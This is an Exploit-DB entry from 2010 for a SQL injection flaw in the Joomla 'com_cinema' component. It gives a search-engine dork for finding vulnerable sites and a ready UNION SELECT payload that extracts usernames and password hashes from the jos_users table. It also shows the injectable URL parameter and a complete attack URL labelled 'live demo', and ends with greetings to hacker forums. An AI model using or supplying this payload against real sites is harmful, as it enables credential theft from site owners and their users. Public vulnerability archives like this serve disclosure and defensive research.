Joomla! Component cinema - SQL Injection

EDB-ID:

13792

CVE:

N/A




Platform:

PHP

Date:

2010-06-09


=========================================================

# Exploit Title: joomla component cinema SQL injection Vulnerability
# Date: 09 juny 2010
# Author: Sudden_death (suddendeath404@yahoo.com)
# Software Link: N/A
# Tested on: Windows XP 2
# Platform / Tested on: Windows XP 2 SP 2
# category: webapps/0day
# myweb : http://sudden.isgreat.org/
# dork : inurl:option=com_cinema

======================================================================

# EXPLOIT / c0de

-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users--

# VULN IN HERE

http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=[exploit]

# LIVE DEMO

http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users--


[#]-------------------------------------------------------------------

GREETZ TO WE FORUM:
-=-[ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org ]-=-

[#]-------------------------------------------------------------------

MY BROTHA :
| bumble_be | Mr.SoOofe | BobyPutrA | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito |
| james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip |
| angga | demnas | ELV1N4 | hateback | virgi | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | z0mb13 | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | 
| r4tu_le64h | huda_style | ranggamagic | maximize13 | and you |
[#]-------------------------------------------------------------------